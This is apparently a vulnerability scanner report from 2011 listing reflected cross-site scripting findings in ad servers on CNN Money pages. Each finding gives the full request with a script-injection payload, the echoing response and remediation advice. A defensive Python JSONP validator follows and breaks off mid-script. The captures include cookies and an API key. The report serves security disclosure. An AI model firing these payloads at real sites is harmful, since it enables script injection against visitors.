GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj?click=http://ads.cnn.com/event.ng/Type=click&FlightID=393569&AdID=543790&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598,10240,12384,17251,18961,19419,20918,25342,25344,25412,27581,32749,32922,33852,34172,34575,35306,45259,45260,45546,45604,46096,46694,47399,48618,48619,48716,49072,49727,50010,50778,50779,50825,51060,51253,51392,51684,51759,52030,52032,52082,52207,52256,52366,52376,52423,52592,52690,52746,52830,52835,52872,52939,52979,53014da770</script><script>alert(1)</script>908b5162157&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=67962
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4e3acdbfe6377; i_1=33:1411:1209:100:0:52753:1312480942:L|33:353:1217:141:0:48529:1312477954:B2|33:1411:1163:100:0:48526:1312477092:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 15 Aug 2011 18:46:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 3023

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
096,46694,47399,48618,48619,48716,49072,49727,50010,50778,50779,50825,51060,51253,51392,51684,51759,52030,52032,52082,52207,52256,52366,52376,52423,52592,52690,52746,52830,52835,52872,52939,52979,53014da770</script><script>alert(1)</script>908b5162157&Values=1589&Redirect=">
...[SNIP]...

1.19. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fcd0</script><script>alert(1)</script>0adc5b924c0 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj?click=http://ads.cnn.com/event.ng/Type=click&FlightID=393569&AdID=543790&TargetID=52045fcd0</script><script>alert(1)</script>0adc5b924c0&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598,10240,12384,17251,18961,19419,20918,25342,25344,25412,27581,32749,32922,33852,34172,34575,35306,45259,45260,45546,45604,46096,46694,47399,48618,48619,48716,49072,49727,50010,50778,50779,50825,51060,51253,51392,51684,51759,52030,52032,52082,52207,52256,52366,52376,52423,52592,52690,52746,52830,52835,52872,52939,52979,53014&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=67962
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4e3acdbfe6377; i_1=33:1411:1209:100:0:52753:1312480942:L|33:353:1217:141:0:48529:1312477954:B2|33:1411:1163:100:0:48526:1312477092:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 15 Aug 2011 18:46:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 3023

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/1313434018**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ads.cnn.com/event.ng/Type=click&FlightID=393569&AdID=543790&TargetID=52045fcd0</script><script>alert(1)</script>0adc5b924c0&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598,10240,12384,17251,18961,19419,20918,25342,25344,25412,27581,32749,32922,33852,34172,34575,35306,45259,45260,45546,45604,46096,46694,4739
...[SNIP]...

1.20. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj [Values parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj

Issue detail

The value of the Values request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36527</script><script>alert(1)</script>47910264d8d was submitted in the Values parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj?click=http://ads.cnn.com/event.ng/Type=click&FlightID=393569&AdID=543790&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598,10240,12384,17251,18961,19419,20918,25342,25344,25412,27581,32749,32922,33852,34172,34575,35306,45259,45260,45546,45604,46096,46694,47399,48618,48619,48716,49072,49727,50010,50778,50779,50825,51060,51253,51392,51684,51759,52030,52032,52082,52207,52256,52366,52376,52423,52592,52690,52746,52830,52835,52872,52939,52979,53014&Values=158936527</script><script>alert(1)</script>47910264d8d&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=67962
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4e3acdbfe6377; i_1=33:1411:1209:100:0:52753:1312480942:L|33:353:1217:141:0:48529:1312477954:B2|33:1411:1163:100:0:48526:1312477092:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 15 Aug 2011 18:47:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 3023

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
399,48618,48619,48716,49072,49727,50010,50778,50779,50825,51060,51253,51392,51684,51759,52030,52032,52082,52207,52256,52366,52376,52423,52592,52690,52746,52830,52835,52872,52939,52979,53014&Values=158936527</script><script>alert(1)</script>47910264d8d&Redirect=">
...[SNIP]...

1.21. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbc1e</script><script>alert(1)</script>a14dae43ccf was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj?click=http://ads.cnn.com/event.ng/Type=clickfbc1e</script><script>alert(1)</script>a14dae43ccf&FlightID=393569&AdID=543790&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598,10240,12384,17251,18961,19419,20918,25342,25344,25412,27581,32749,32922,33852,34172,34575,35306,45259,45260,45546,45604,46096,46694,47399,48618,48619,48716,49072,49727,50010,50778,50779,50825,51060,51253,51392,51684,51759,52030,52032,52082,52207,52256,52366,52376,52423,52592,52690,52746,52830,52835,52872,52939,52979,53014&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=67962
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4e3acdbfe6377; i_1=33:1411:1209:100:0:52753:1312480942:L|33:353:1217:141:0:48529:1312477954:B2|33:1411:1163:100:0:48526:1312477092:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 15 Aug 2011 18:46:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 3023

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
pt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/1313434012**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ads.cnn.com/event.ng/Type=clickfbc1e</script><script>alert(1)</script>a14dae43ccf&FlightID=393569&AdID=543790&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598,10240,12384,17251,18961,19419,20918,25342,25344,25412,27581,32749,32922,33852,34172,34575,3530
...[SNIP]...

1.22. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e778</script><script>alert(1)</script>3423c7cdc8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. The page rebuilds the request's own query string inside an inline script, as the src of a nested script tag that it writes, so any parameter name reaches the script context, not only the documented ones; since nothing is escaped, the </script> sequence in the name terminates the script block and the browser parses the injected tag as markup.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where that cannot be avoided, the data must be escaped for the JavaScript string context (\uXXXX-encode quotes, backslashes, <, > and the U+2028/U+2029 line terminators) so that neither the enclosing quote nor a </script> sequence can appear; HTML-entity encoding does not help inside a script block, because the HTML parser does not decode entities there.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj?click=http://ads.cnn.com/event.ng/Type=click&FlightID=393569&AdID=543790&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598,10240,12384,17251,18961,19419,20918,25342,25344,25412,27581,32749,32922,33852,34172,34575,35306,45259,45260,45546,45604,46096,46694,47399,48618,48619,48716,49072,49727,50010,50778,50779,50825,51060,51253,51392,51684,51759,52030,52032,52082,52207,52256,52366,52376,52423,52592,52690,52746,52830,52835,52872,52939,52979,53014&Values=1589&Redirect=&5e778</script><script>alert(1)</script>3423c7cdc8e=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=67962
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4e3acdbfe6377; i_1=33:1411:1209:100:0:52753:1312480942:L|33:353:1217:141:0:48529:1312477954:B2|33:1411:1163:100:0:48526:1312477092:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 15 Aug 2011 18:47:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 3029

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
8619,48716,49072,49727,50010,50778,50779,50825,51060,51253,51392,51684,51759,52030,52032,52082,52207,52256,52366,52376,52423,52592,52690,52746,52830,52835,52872,52939,52979,53014&Values=1589&Redirect=&5e778</script><script>alert(1)</script>3423c7cdc8e=1">
...[SNIP]...

1.23. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload e993b<script>alert(1)</script>ef71ec02685 was submitted in the pid parameter. This input was echoed unmodified in the application's response. The server tries to parse pid as a number and, when that fails, writes the text of the resulting java.lang.NumberFormatException, which quotes the raw input, into the <head> of the page without encoding it.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=1290411&placementId=1508451&pid=754773e993b<script>alert(1)</script>ef71ec02685&ps=-1&zw=475&zh=260&url=http%3A//money.cnn.com/2011/08/15/technology/google_motorola/index.htm%3Fhpt%3Dhp_t2&v=5&dct=Google%20to%20buy%20Motorola%20Mobility%20for%20%2412.5%20billion%20-%20Aug.%2015%2C%202011&ref=http%3A//www.cnn.com/ HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=technology&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=766274
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TData=_Mon%2C%2008%20Aug%202011%2001%3A36%3A19%20GMT

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:28 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2509


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "754773e993b<script>alert(1)</script>ef71ec02685"

   
                                                           </head>
...[SNIP]...

1.24. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 5c8ab--><script>alert(1)</script>09947fcc484 was submitted in the placementId parameter. This input was echoed unmodified in the application's response. As with pid, the echo is the unencoded java.lang.NumberFormatException message, here written inside an HTML comment; the --> in the payload closes that comment and the script tag that follows is parsed as markup. Note that this response is served with Content-Type: text/plain, so a browser that honours the declared type shows the body as text instead of parsing it; exploitation by direct navigation depends on the client sniffing the content as HTML.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. Validate the parameter as the integer it is supposed to be before anything else, and do not copy the rejected value into the error output; if a value must appear inside a comment, HTML-encode it and break up any -- sequence so the comment cannot be closed early.

Request

GET /adserving/getAds.jsp?previousPlacementIds=1290411&placementId=15084515c8ab--><script>alert(1)</script>09947fcc484&pid=754773&ps=-1&zw=475&zh=260&url=http%3A//money.cnn.com/2011/08/15/technology/google_motorola/index.htm%3Fhpt%3Dhp_t2&v=5&dct=Google%20to%20buy%20Motorola%20Mobility%20for%20%2412.5%20billion%20-%20Aug.%2015%2C%202011&ref=http%3A//www.cnn.com/ HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=technology&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=766274
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TData=_Mon%2C%2008%20Aug%202011%2001%3A36%3A19%20GMT

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:26 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3324
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "15084515c8ab--><script>alert(1)</script>09947fcc484" -->
...[SNIP]...

1.25. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload f5ed1--><script>alert(1)</script>0d8bde65243 was submitted in the ps parameter. This input was echoed unmodified in the application's response. The mechanism is the same as for placementId: the unencoded java.lang.NumberFormatException message is written inside an HTML comment, and the response is again served as Content-Type: text/plain, so direct-navigation exploitation relies on content sniffing.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=1290411&placementId=1508451&pid=754773&ps=-1f5ed1--><script>alert(1)</script>0d8bde65243&zw=475&zh=260&url=http%3A//money.cnn.com/2011/08/15/technology/google_motorola/index.htm%3Fhpt%3Dhp_t2&v=5&dct=Google%20to%20buy%20Motorola%20Mobility%20for%20%2412.5%20billion%20-%20Aug.%2015%2C%202011&ref=http%3A//www.cnn.com/ HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=technology&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=766274
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TData=_Mon%2C%2008%20Aug%202011%2001%3A36%3A19%20GMT

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:31 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3763
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-1f5ed1--><script>alert(1)</script>0d8bde65243" -->
   
...[SNIP]...

1.26. http://api.bizographics.com/v1/profile.json [&callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the callback request parameter (recorded by the scanner as &callback because the query string starts with ?&callback=) is copied into the response as plain text. The payload 85448<script>alert(1)</script>62018abb6b0 was submitted in the callback parameter. This input was echoed unmodified in the application's response. The endpoint is a JSONP API: the callback name is prepended verbatim to the JSON profile object, so whatever the caller supplies becomes the first bytes of the body. The response is served as application/json; a browser honouring that type does not render it as HTML on direct navigation, so this form of the attack depends on content sniffing, but a callback that is not restricted to identifier characters is the classic JSONP injection and should be rejected server-side.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=cnnad_bizo_load_ad_callback85448<script>alert(1)</script>62018abb6b0&api_key=vuy5aqx2hg8yv997yw9e5jr4 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KX2vDEYkjj68aj5XcunNcMDa7Re6IGD4lLWOSE2iimqa3Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtR5QpvePKBw6ArykBishtoVkEVUJBxdqAyD3lFIcLMteW4iiqSbERYipuWHxYXQtZCS6EipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Mon, 15 Aug 2011 18:45:54 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KUEXQDRa4FQSaj5XcunNcMDa7Re6IGD4lKisu1VJlT9GUAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQiizxJ8nJqAyzmNdcv2CGOaEVUJBxdqAyAwipn98ipCZ0XpiijciiL4ZWqFatDBXHIOgV0ipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 217
Connection: keep-alive

cnnad_bizo_load_ad_callback85448<script>alert(1)</script>62018abb6b0({"bizographics":{"industry":[{"code":"business_services","name":"Business Services"}],"location":{"code":"texas","name":"USA - Texas"}},"usage":1});
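Added example, not bizographics' code: a callback allow-list and a hardened JSONP response builder in Python, showing what the profile.json endpoint would need in order to reject the payload above instead of echoing it. The endpoint shape, the header names and the sample profile object are taken from the capture; the identifier pattern, the 64-character cap and the 400 error text are this example's assumptions.

```python
import json
import re

# JSONP callback allow-list: a dotted chain of JavaScript identifiers such as
# "cnnad_bizo_load_ad_callback" or "window.cb". Anything outside this set is
# refused instead of echoed, so "<", quotes, spaces and parentheses can never
# reach the start of the response body. (Pattern and 64-char cap are this
# example's assumptions, not bizographics' rules.)
_CALLBACK_RE = re.compile(r'^[A-Za-z_$][A-Za-z0-9_$]*(?:\.[A-Za-z_$][A-Za-z0-9_$]*)*$')
_MAX_CALLBACK_LEN = 64

# Constructed sample shaped like the profile object in the capture above.
SAMPLE_PROFILE = {
    "bizographics": {
        "industry": [{"code": "business_services", "name": "Business Services"}],
        "location": {"code": "texas", "name": "USA - Texas"},
    },
    "usage": 1,
}


def is_valid_callback(name):
    """True only for plain (dotted) identifiers of reasonable length."""
    return (isinstance(name, str)
            and len(name) <= _MAX_CALLBACK_LEN
            and _CALLBACK_RE.match(name) is not None)


def jsonp_response(callback, payload):
    """Return (status, headers, body) for /v1/profile.json?callback=...

    - an invalid callback yields 400 with a fixed message: the submitted
      value is never written back, so there is nothing to inject into;
    - json.dumps(ensure_ascii=True) writes every non-ASCII code point as
      \\uXXXX, which also neutralises the U+2028/U+2029 line terminators
      that would otherwise end a JavaScript string literal;
    - the '/**/' prefix keeps attacker-chosen bytes away from offset 0,
      the defence adopted against Rosetta-Flash-style abuse of JSONP;
    - the body is labelled as script with nosniff, so a browser never
      treats it as HTML regardless of what it contains.
    """
    headers = {
        'Content-Type': 'application/javascript; charset=utf-8',
        'X-Content-Type-Options': 'nosniff',
        'Cache-Control': 'no-store',
    }
    if not is_valid_callback(callback):
        headers['Content-Type'] = 'text/plain; charset=utf-8'
        return 400, headers, 'invalid callback parameter'
    data = json.dumps(payload, separators=(',', ':'), ensure_ascii=True)
    return 200, headers, f'/**/{callback}({data});'


if __name__ == '__main__':
    good = 'cnnad_bizo_load_ad_callback'
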